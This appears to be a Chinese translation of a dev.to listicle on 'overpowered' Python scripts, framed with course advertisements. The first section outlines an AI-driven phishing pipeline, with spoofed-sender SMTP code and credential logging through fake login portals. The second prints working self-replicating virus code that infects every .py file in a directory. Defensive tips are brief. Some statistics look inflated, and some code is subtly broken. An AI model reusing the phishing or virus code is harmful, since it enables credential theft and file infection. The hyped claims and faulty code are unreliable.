阿川私房教材:
學 JavaScript 前端,帶作品集去面試!

63 個專案實戰,寫出作品集,讓面試官眼前一亮!

立即開始免費試讀!

💡現存最瘋狂、最荒謬的 Python 腳本——以及它們為何令人恐懼。

他們寫程式碼,卻打破現實

讓我們明確一點:Python 不僅僅是初學者教程和無害資料腳本的語言。

這是現代的魔法書。

有些人寫的咒語非常強大,甚至可能破壞了現實規則。

我們正在談論可以超越人類滲透到機器自我重寫的Python 腳本。這些腳本不僅令人印象深刻,而且具有潛在的危險。

但不要把目光移開。這並不是為了嚇唬你。這是為了讓你做好準備。因為無論您是開發人員、技術愛好者,還是想要在程式碼執行的世界中保持領先一步的人,您都需要知道什麼是可能的。

如果你是 Python 開發人員呢?將此書籤作為參考。

👉 Python 開發者資源 - 由 0x3d.site 製作

為 Python 開發人員精心策劃的中心,提供必備工具、文章和熱門討論。

從程式碼工具到尖端的人工智慧專案,這是您保持敏銳的日常指揮中心。


🔐 1. 命中率高達 99% 的 AI 網路釣魚產生器

資訊:

根據 IBM 2023 年威脅情報報告,網路釣魚佔所有網路攻擊的41% 。人工智慧驅動的網路釣魚的興起使得未經訓練的目標的成功率超過 90%。

這個 Python 腳本將 AI 文字產生與電子郵件欺騙和 HTML 偽造結合在一起。

工作原理:

  1. 使用類似 GPT 的 API (或本機模型)來產生電子郵件內容。

  2. 模仿 Apple、PayPal 或 Microsoft 等公司的品牌和寫作風格。

  3. 使用Flask或靜態 HTML 產生虛假登入入口網站。

  4. 使用具有 IP 輪換的 SMTP 庫發送電子郵件。

  5. 將憑證靜默記錄到資料庫或 CSV 中。

這是一個範例(僅供教育使用):

import smtplib
from email.mime.text import MIMEText

def send_phish_email(to_address, subject, body):
    msg = MIMEText(body, 'html')
    msg['Subject'] = subject
    msg['From'] = '[email protected]'
    msg['To'] = to_address

    with smtplib.SMTP('smtp.sendgrid.net', 587) as server:
        server.starttls()
        server.login('apikey', 'YOUR_SENDGRID_API_KEY')
        server.sendmail(msg['From'], [to_address], msg.as_string())

🧠 為了製作電子郵件正文,腳本可能會使用:

from openai import OpenAI

def generate_email(prompt):
    return openai.ChatCompletion.create(
        model="gpt-4",
        messages=[{"role": "user", "content": prompt}]
    )['choices'][0]['message']['content']

警告:如果惡意使用這種腳本是極度違法的。只有道德駭客環境和意識培訓才應該託管此類程式碼。


🦠 2. 感染其他腳本的自複製 Python 惡意軟體

這簡直就像是科幻電影裡的情節。

資訊:

MITRE 和卡巴斯基的研究人員已經證實在現實的 Linux 環境中發現了 Python 惡意軟體。最危險的形式是無檔案、隱藏在記憶體或合法腳本檔案中。

它的作用:

  • 掃描目錄中的.py檔。

  • 檢查是否已感染。

  • 如果不是,則將其有效負載附加到目標腳本中。

  • 每個週期使用輕微的程式碼變更來避免簽名偵測。

一個非常基本的自我複製片段的範例:

virus_code = """# begin_virus
import os
print("You've been infected!")
# end_virus"""

def infect_files():
    for file in os.listdir():
        if file.endswith('.py') and 'infected' not in file:
            with open(file, 'r') as f:
                content = f.read()
            if '# begin_virus' not in content:
                with open(file, 'w') as f:
                    f.write(virus_code + '\n' + content)

infect_files()

真正的惡意軟體會對其進行加密,混淆函數名稱,並在系統重新啟動後繼續存在。它甚至可能使用pyinstaller來建立獨立的.exe檔。

你應該做什麼

  • 使用不可變的部署容器

  • 使用 Tripwire 或 OSSEC 等工具監控檔案完整性

  • 不要執行未經驗證的.py檔案 — 即使來自 GitHub。

📚 透過更新的實踐和真實案例保持安全:

🔗開發者資源 @ python.0x3d.site/dev-resources


  • 如果你有空的話可以嘗試(這也是促銷活動)

--coNEAPjPI


🤖 3. 聽起來像人類的人工智慧聊天機器人-可以愚弄所有人

這些機器人不僅聰明——而且令人不安地可信

資訊:

2024 年,史丹佛大學的研究人員在一個模擬城鎮中對人工智慧代理進行了公開測試。超過 70% 的人類參與者未能檢測出哪些角色是機器人。

Python 機器人透過圖靈測試的方式如下:

  1. 會話記憶:

它們將使用者互動儲存在sqlite3redis中以模擬記憶體。

  1. 打字模擬:

使用pyautoguitime.sleep等函式庫來模擬打字行為。

  1. 行為模仿:

它們會引入猶豫、俚語、諷刺,甚至拼字錯誤。

範例機器人骨架

import time
import random
import openai

def simulate_typing(text):
    for char in text:
        print(char, end='', flush=True)
        time.sleep(random.uniform(0.03, 0.15))

def chat_response(prompt):
    response = openai.ChatCompletion.create(
        model="gpt-4",
        messages=[{"role": "user", "content": prompt}]
    )['choices'][0]['message']['content']
    return response

while True:
    user_input = input("You: ")
    reply = chat_response(user_input)
    simulate_typing("Bot: " + reply + "\n")

🎯 這些機器人已經在管理 subreddits、提供技術支援並融入 Discord 伺服器。不要以為您正在與某人在線聊天。

👀 好奇這些在野外是如何使用的?

👉 python.0x3d.site/trending-discussions 上的熱門討論


💻 4. 編寫腳本的腳本(AutoCoder)

你給它一個任務,它就會為你寫整個 Python 腳本——端到端。

資訊:

GitHub Copilot 和TabbyCodeGeeXSmol Developer等開源替代品重新定義了生產力。一些開發人員報告說,使用自動化程式碼工具可以將原型設計速度提高 5 倍

它看起來是這樣的:

# config.yaml
task: "Create a FastAPI server that accepts a POST request and returns the square of the number sent."
language: python
framework: fastapi

此腳本讀取 YAML,形成 GPT 提示,產生程式碼,透過測試輸入進行驗證,然後部署。

🔧 使用的工具:

  • PyYAML用於設定解析

  • openaiollama用於本地模型

  • pytest或自訂斷言用於驗證

這是樣板的未來。

🔗 在這裡探索快速啟動工具和生成器:

🛠 python.0x3d.site/trending-repositories 上的熱門儲存庫


⚖️ 5. 天才與誤用的界限

所有這些腳本都有一個共同點:權力。

權力落入壞人手中?它會破壞事物。但權力掌握在正確的人手中?它起保護作用。

真正的要點並不是這些腳本很危險。它們是可以學習的。透過了解它們,您可以更好地建立更聰明的工具、保護用戶並無所畏懼地進行創新。


🧠 最後的想法:使用 Python 來防禦,而不僅僅是建置

事情是這樣的。

程式碼不再只是我們寫的東西。這是我們生活在其中的東西。您使用的每一個應用程式、您填寫的每一張表格、您閱讀的每封電子郵件——都是由程式碼驅動的。

Python 可能很容易編寫。但其影響卻並不簡單。

所以要深入學習。研究什麼是可能的。成為那種不僅知道要建造什麼,而且知道要注意什麼的開發人員。

收藏此頁:

🔗 Python 開發者資源 - 由 0x3d.site 製作

掌握現代 Python 的大本營:重要的文章、工具與討論。


讓我們創造突破極限但保護人們的東西。

因為 Python 不僅僅是一種語言。這是一種力量。

👊 您準備好明智地使用它了嗎?


📚面向開發人員的優質學習資源

透過這些結構化、高價值的課程擴展您的知識:

🚀開發人員的網路安全生存工具包- 使用 Burp Suite、Nmap 和 OSINT 技術等實際策略和工具保護您的程式碼。

💰開發人員的被動收入指南—10 多種將您的編碼技能貨幣化並建立自動化收入流的方法。

🌐網路的工作原理:執行網路的技術-深入了解網路背後的協定、伺服器和基礎設施。

💻 API 程式設計:了解 API、協定、安全性和實作-使用基於維基百科的結構化學習來掌握 API 基礎知識。

🕵️技術人員的終極 OSINT 指南– 學習像專業人士一樣追蹤、分析和保護數位足跡。

🧠駭客和間諜如何使用相同的心理技巧來對付你——發現科技中說服、欺騙和操縱的陰暗面。

🔥更多小眾、高價值學習資源 →看全部


https://snappytuts.gumroad.com/l/shiyy


https://medium.com/@snappytuts.official/the-most-overpowered-python-scripts-ever-written-7197483b541d


原文出處:https://dev.to/snappytuts/the-most-overpowered-python-scripts-ever-written-159f

按讚的人:

共有 0 則留言


精選技術文章翻譯,幫助開發者持續吸收新知。

阿川私房教材:
學 JavaScript 前端,帶作品集去面試!

63 個專案實戰,寫出作品集,讓面試官眼前一亮!

立即開始免費試讀!